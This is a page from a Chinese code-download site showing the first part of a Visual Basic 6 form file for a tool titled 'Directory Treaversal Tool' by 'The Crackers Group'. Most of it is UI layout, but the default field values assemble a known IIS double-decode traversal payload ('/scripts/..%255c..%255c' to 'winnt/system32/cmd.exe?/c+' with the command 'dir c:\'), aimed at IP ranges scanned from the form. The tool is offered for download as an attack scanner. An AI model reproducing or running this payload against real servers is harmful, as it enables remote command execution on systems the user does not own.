⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 form4.frm

📁 全面网络扫描器VB源代码 很实用
💻 FRM
📖 第 1 页 / 共 2 页
字号:
VERSION 5.00
Object = "{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}#1.1#0"; "shdocvw.dll"
Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX"
Object = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0"; "MSCOMCTL.OCX"
Object = "{F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0"; "COMDLG32.OCX"
Begin VB.Form Frmdt 
   BackColor       =   &H00000000&
   Caption         =   "Directory Treaversal  Tool  - Copyright 2005  The Crackers Group Inc"
   ClientHeight    =   8190
   ClientLeft      =   -180
   ClientTop       =   510
   ClientWidth     =   11880
   ClipControls    =   0   'False
   ControlBox      =   0   'False
   Icon            =   "form4.frx":0000
   LinkTopic       =   "Form1"
   MDIChild        =   -1  'True
   ScaleHeight     =   8190
   ScaleWidth      =   11880
   WindowState     =   2  'Maximized
   Begin MSWinsockLib.Winsock wsckClient 
      Index           =   0
      Left            =   1560
      Top             =   2640
      _ExtentX        =   741
      _ExtentY        =   741
      _Version        =   393216
   End
   Begin VB.CommandButton cmdCollapse 
      BackColor       =   &H00FFFFFF&
      Caption         =   "Collapse All"
      Height          =   255
      Left            =   4560
      Style           =   1  'Graphical
      TabIndex        =   36
      Top             =   1560
      Width           =   1215
   End
   Begin VB.CommandButton cmdexpand 
      BackColor       =   &H00FFFFFF&
      Caption         =   "Expand All"
      Height          =   255
      Left            =   4560
      Style           =   1  'Graphical
      TabIndex        =   35
      Top             =   1200
      Width           =   1215
   End
   Begin VB.Timer timcl 
      Enabled         =   0   'False
      Interval        =   10000
      Left            =   1680
      Top             =   2520
   End
   Begin SHDocVwCtl.WebBrowser wb1 
      Height          =   30
      Index           =   0
      Left            =   8280
      TabIndex        =   33
      Top             =   8145
      Visible         =   0   'False
      Width           =   30
      ExtentX         =   53
      ExtentY         =   53
      ViewMode        =   0
      Offline         =   0
      Silent          =   0
      RegisterAsBrowser=   0
      RegisterAsDropTarget=   1
      AutoArrange     =   0   'False
      NoClientEdge    =   0   'False
      AlignLeft       =   0   'False
      NoWebView       =   0   'False
      HideFileNames   =   0   'False
      SingleClick     =   0   'False
      SingleSelection =   0   'False
      NoFolders       =   0   'False
      Transparent     =   0   'False
      ViewID          =   "{0057D0E0-3573-11CF-AE69-08002B2E1262}"
      Location        =   "http:///"
   End
   Begin VB.Timer Timer2 
      Enabled         =   0   'False
      Interval        =   1000
      Left            =   1440
      Top             =   2040
   End
   Begin VB.OptionButton Option1 
      BackColor       =   &H80000009&
      Caption         =   "With Me"
      Height          =   255
      Left            =   7560
      TabIndex        =   17
      Top             =   600
      Value           =   -1  'True
      Width           =   1455
   End
   Begin VB.OptionButton Option2 
      BackColor       =   &H80000009&
      Caption         =   "With Browser"
      Height          =   255
      Left            =   9120
      TabIndex        =   32
      Top             =   600
      Width           =   1455
   End
   Begin VB.TextBox txtcmd 
      BeginProperty Font 
         Name            =   "Arial"
         Size            =   9.75
         Charset         =   0
         Weight          =   700
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      Height          =   345
      Left            =   2640
      TabIndex        =   13
      Text            =   "dir c:\"
      Top             =   5520
      Width           =   2895
   End
   Begin VB.TextBox txtfilename 
      BeginProperty Font 
         Name            =   "Arial"
         Size            =   9.75
         Charset         =   0
         Weight          =   700
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      Height          =   375
      Left            =   2640
      TabIndex        =   12
      Text            =   "winnt/system32/cmd.exe?/c+"
      Top             =   4440
      Width           =   2895
   End
   Begin VB.TextBox txtscripts 
      BeginProperty Font 
         Name            =   "Arial"
         Size            =   12
         Charset         =   0
         Weight          =   700
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      Height          =   300
      Left            =   2640
      TabIndex        =   11
      Text            =   "..%255c..%255c"
      Top             =   3360
      Width           =   2895
   End
   Begin VB.TextBox txtfolder 
      BeginProperty Font 
         Name            =   "Arial"
         Size            =   9.75
         Charset         =   0
         Weight          =   700
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      Height          =   285
      Left            =   2640
      TabIndex        =   10
      Text            =   "/scripts/"
      Top             =   2400
      Width           =   2895
   End
   Begin MSComDlg.CommonDialog cd1 
      Left            =   1560
      Top             =   3360
      _ExtentX        =   847
      _ExtentY        =   847
      _Version        =   393216
   End
   Begin VB.CommandButton cmdclear 
      BackColor       =   &H80000009&
      Caption         =   "Clear All"
      Height          =   255
      Left            =   3120
      Style           =   1  'Graphical
      TabIndex        =   16
      Top             =   1560
      Width           =   1335
   End
   Begin VB.TextBox txtendip 
      Appearance      =   0  'Flat
      Height          =   285
      Index           =   3
      Left            =   3000
      TabIndex        =   9
      Text            =   "254"
      Top             =   720
      Width           =   495
   End
   Begin VB.TextBox txtendip 
      Appearance      =   0  'Flat
      Height          =   285
      Index           =   2
      Left            =   2520
      TabIndex        =   8
      Text            =   "0"
      Top             =   720
      Width           =   495
   End
   Begin VB.TextBox txtendip 
      Appearance      =   0  'Flat
      Height          =   285
      Index           =   1
      Left            =   2040
      TabIndex        =   7
      Text            =   "0"
      Top             =   720
      Width           =   495
   End
   Begin VB.TextBox txtendip 
      Appearance      =   0  'Flat
      Height          =   285
      Index           =   0
      Left            =   1560
      TabIndex        =   6
      Text            =   "127"
      Top             =   720
      Width           =   495
   End
   Begin VB.TextBox txtip 
      Appearance      =   0  'Flat
      Height          =   285
      Index           =   3
      Left            =   3000
      TabIndex        =   5
      Text            =   "1"
      Top             =   240
      Width           =   495
   End
   Begin VB.TextBox txtip 
      Appearance      =   0  'Flat
      Height          =   285
      Index           =   2
      Left            =   2520
      TabIndex        =   4
      Text            =   "0"
      Top             =   240
      Width           =   495
   End
   Begin VB.TextBox txtip 
      Appearance      =   0  'Flat
      Height          =   285
      Index           =   1
      Left            =   2040
      TabIndex        =   3
      Text            =   "0"
      Top             =   240
      Width           =   495
   End
   Begin VB.TextBox txtip 
      Appearance      =   0  'Flat
      Height          =   285
      Index           =   0
      Left            =   1560
      TabIndex        =   2
      Text            =   "127"
      Top             =   240
      Width           =   495
   End
   Begin VB.VScrollBar VScroll1 
      Height          =   255
      LargeChange     =   50
      Left            =   9120
      Max             =   30000
      Min             =   1
      SmallChange     =   50
      TabIndex        =   24
      Top             =   120
      Value           =   1000
      Width           =   255
   End
   Begin VB.CommandButton cmddelete 
      BackColor       =   &H80000014&
      Caption         =   "Delete.."
      Height          =   255
      Left            =   3120
      Style           =   1  'Graphical
      TabIndex        =   1
      Top             =   1200
      Width           =   1335
   End
   Begin VB.TextBox txtdelay 
      DataField       =   "number"
      BeginProperty DataFormat 
         Type            =   1
         Format          =   "#,##0"
         HaveTrueFalseNull=   0
         FirstDayOfWeek  =   0
         FirstWeekOfYear =   0
         LCID            =   1065
         SubFormatType   =   1
      EndProperty
      Height          =   285
      Left            =   7920
      Locked          =   -1  'True
      TabIndex        =   23
      Text            =   "1000"
      Top             =   120
      Width           =   1095
   End
   Begin VB.CommandButton Command1 
      BackColor       =   &H00FFFFFF&
      Caption         =   "STOP SCAN"
      Height          =   495
      Left            =   5280
      Style           =   1  'Graphical
      TabIndex        =   15
      Top             =   120
      Width           =   1215
   End
   Begin VB.Timer Timer1 
      Enabled         =   0   'False
      Interval        =   1000
      Left            =   1200
      Top             =   2760
   End
   Begin VB.CommandButton Addnew 
      BackColor       =   &H80000009&
      Caption         =   "Add New.."
      Height          =   255
      Left            =   1560
      Style           =   1  'Graphical
      TabIndex        =   0
      Top             =   1200
      Width           =   1455
   End
   Begin VB.ListBox List1 
      Height          =   5820
      ItemData        =   "form4.frx":8046
      Left            =   360
      List            =   "form4.frx":8048
      MultiSelect     =   2  'Extended
      TabIndex        =   20
      Top             =   1680
      Width           =   1935
   End
   Begin VB.CommandButton cmdSend 
      BackColor       =   &H00FFFFFF&
      Caption         =   "START SCAN"
      Enabled         =   0   'False
      BeginProperty Font 
         Name            =   "Arial"
         Size            =   9.75
         Charset         =   0
         Weight          =   700
         Underline       =   0   'False
         Italic          =   0   'False
         Strikethrough   =   0   'False
      EndProperty
      Height          =   495
      Left            =   3720
      MaskColor       =   &H00FFFFFF&
      Style           =   1  'Graphical
      TabIndex        =   14
      Top             =   120
      Width           =   1455
   End
   Begin MSComctlLib.TreeView TreeView1 
      Height          =   6615
      Left            =   5760
      TabIndex        =   26
      Top             =   960
      Width           =   6015
      _ExtentX        =   10610
      _ExtentY        =   11668
      _Version        =   393217
      LineStyle       =   1
      Style           =   6
      Appearance      =   1
   End
   Begin VB.Label lblstat 
      BackColor       =   &H80000003&
      Height          =   375
      Left            =   3120
      TabIndex        =   34
      Top             =   7440
      Width           =   4095
   End
   Begin VB.Label Label9 
      BackColor       =   &H80000009&
      Caption         =   "Method"
      Height          =   255
      Left            =   6720
      TabIndex        =   31
      Top             =   600
      Width           =   615
   End
   Begin VB.Label Label7 
      BackColor       =   &H00000000&
      Caption         =   "Command For Run"
      ForeColor       =   &H00FFFFFF&
      Height          =   255
      Left            =   2640
      TabIndex        =   30
      Top             =   5040
      Width           =   1575
   End
   Begin VB.Label Label6 
      BackColor       =   &H00000000&
      Caption         =   "File Name To Run"
      ForeColor       =   &H00FFFFFF&
      Height          =   255
      Left            =   2640
      TabIndex        =   29
      Top             =   3960
      Width           =   2055
   End
   Begin VB.Label Label5 
      BackColor       =   &H00000000&
      Caption         =   "Scripts Type"
      ForeColor       =   &H00FFFFFF&
      Height          =   255
      Left            =   2640
      TabIndex        =   28
      Top             =   2880
      Width           =   1095
   End
   Begin VB.Label lblfolder 
      BackColor       =   &H00000000&
      Caption         =   "Scripts Folder"
      ForeColor       =   &H00FFFFFF&
      Height          =   255
      Left            =   2640
      TabIndex        =   27
      Top             =   1920
      Width           =   1575
   End
   Begin VB.Label lblmain 

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -